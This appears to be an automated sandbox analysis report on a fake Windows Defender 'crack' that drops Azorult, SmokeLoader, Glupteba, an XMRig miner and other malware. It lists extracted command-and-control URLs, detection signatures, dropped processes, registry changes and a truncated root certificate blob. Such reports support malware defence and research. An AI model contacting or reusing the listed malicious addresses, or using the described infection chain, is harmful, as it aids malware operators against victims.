Analysis
-
max time kernel
24s -
max time network
602s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
03-04-2021 06:46
Static task
static1
Behavioral task
behavioral1
Sample
Microsoft_Windows_Defender_crack.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Microsoft_Windows_Defender_crack.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Microsoft_Windows_Defender_crack.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Microsoft_Windows_Defender_crack.exe
Resource
win10v20201028
General
-
Target
Microsoft_Windows_Defender_crack.exe
-
Size
5.4MB
-
MD5
be12bd9c6b6e9e5738e171924e141b7d
-
SHA1
a90d8051e8116fe24abf2605fae1b8ad31f12104
-
SHA256
6ffb691be76a6756dbda8cc9c12b72be6a6eb89fa32770c9f1c201393c4f708c
-
SHA512
8c2031c71b856ab8010cfee225a6987e0eb1d9870c4b154a9a75db1829d0fa790dace44352e3932332e6fc612455ddc42adbc14f6ce9f91b6a736595c2986279
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral3/memory/4228-219-0x00000000026D0000-0x0000000002FDA000-memory.dmp family_glupteba behavioral3/memory/4228-221-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral3/memory/4228-222-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
XMRig Miner Payload 8 IoCs
resource yara_rule behavioral3/memory/2020-154-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/2020-155-0x00000001402CA898-mapping.dmp xmrig behavioral3/memory/2020-165-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/2020-231-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/6936-804-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/6936-916-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/10004-930-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/10004-1213-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 10 IoCs
pid Process 2752 keygen-pr.exe 980 keygen-step-1.exe 832 keygen-step-3.exe 1552 keygen-step-4.exe 2480 key.exe 2500 Setup.exe 1340 multitimer.exe 2068 setups.exe 3636 askinstall20.exe 964 setups.tmp -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 964 setups.tmp 964 setups.tmp 964 setups.tmp 964 setups.tmp 964 setups.tmp 964 setups.tmp 964 setups.tmp -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rundll32.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 13 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 458 api.ipify.org 576 ipinfo.io 600 ipinfo.io 751 ipinfo.io 123 ipinfo.io 283 ipinfo.io 389 ip-api.com 418 api.ipify.org 753 ipinfo.io 77 api.ipify.org 125 ipinfo.io 169 ip-api.com 281 ipinfo.io -
Program crash 11 IoCs
pid pid_target Process procid_target 4300 5772 WerFault.exe 149 4452 4312 WerFault.exe 244 4808 8904 WerFault.exe 351 9464 4496 WerFault.exe 133 11048 5900 WerFault.exe 152 11100 5900 WerFault.exe 152 5452 5900 WerFault.exe 152 10836 5900 WerFault.exe 152 3156 6060 WerFault.exe 431 10612 688 WerFault.exe 447 7460 8380 WerFault.exe 509 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 13 IoCs
pid Process 836 timeout.exe 7648 timeout.exe 3308 timeout.exe 11108 timeout.exe 9528 timeout.exe 9304 timeout.exe 1060 timeout.exe 7072 timeout.exe 9244 timeout.exe 5232 timeout.exe 10580 timeout.exe 6448 timeout.exe 3892 timeout.exe -
Kills process with taskkill 10 IoCs
pid Process 7584 taskkill.exe 4840 taskkill.exe 7348 taskkill.exe 8008 taskkill.exe 324 taskkill.exe 892 taskkill.exe 5468 taskkill.exe 10756 taskkill.exe 3200 taskkill.exe 4212 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000006bed0f7c8342488f055f7e4b0cb5aecc9baf5521e7cba86d105307f1942954181262e48e8884bf233db9ba013547f1bfa8182eb61a30c5590a45244c39f2663ecf274fad90d3f77503ec27edc538c6e2b91312cda2c22bb2d284 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{BFD03315-15F4-4809-8045-C08EB5B623D0} = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{E799754D-8C77-4FDE-9583-855E8272B26C}" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "5" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000042aaf37afc274b47485bdb985fbe168aa29f90a7d3d7ce52519b80809d0cd6793184b594d3b9a44627452aa7c21f57671d1cfc687d828ea52f3c0adc564a841f656b7d54ab249d5d1da4731fe9215e879bb5983890d5c75ad1e1da346179c7f2187f8c6ef008fecbe598532dd76410a33e8c392809726985a8ac5184cb380d6e62e093389d052f3fec41133dff887cfcc6bf014271f7079819bc0fb314295f116bae648fcbbb8a1b4fc0d4b9112e11d67d70321c9c0546b50b31efae5febad1c45092c9240ca84504b33126329f4cbfe97bd7339073d0c8c2d2b15cbf21d966a4b11472917d2ddc086bb6040327b696c1fc83a36a93da6c7c8c99f7a6b61454f82e679603d73f0370c797e2aeb635ae596af9dcd2ba7ea0cbf2d1e4f6456c28aa4a87e8d4c4d5def338b57baa44cd7bb039498a70a19d28939764252d89b644cad77fe4830008aa8ef121b098ed603989595ddf8b534d81352c4f0a510d2b843bc73a637ba2b5a52a92ea7b96ca20a541bd469f42c9990d59a36747b799a7ac6d1bc1fa4a870a73a4f005d54424e0ee40470810bbfe6758fcaba7727f0bd12b5dc451ac1f60a MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000c35369f47b6f73184db8d6aec40998257391420f5f866735a803bb72cc77e95f6a57934b8004e64633192d5278f34f34db506c17936754342249 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 494198a45528d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e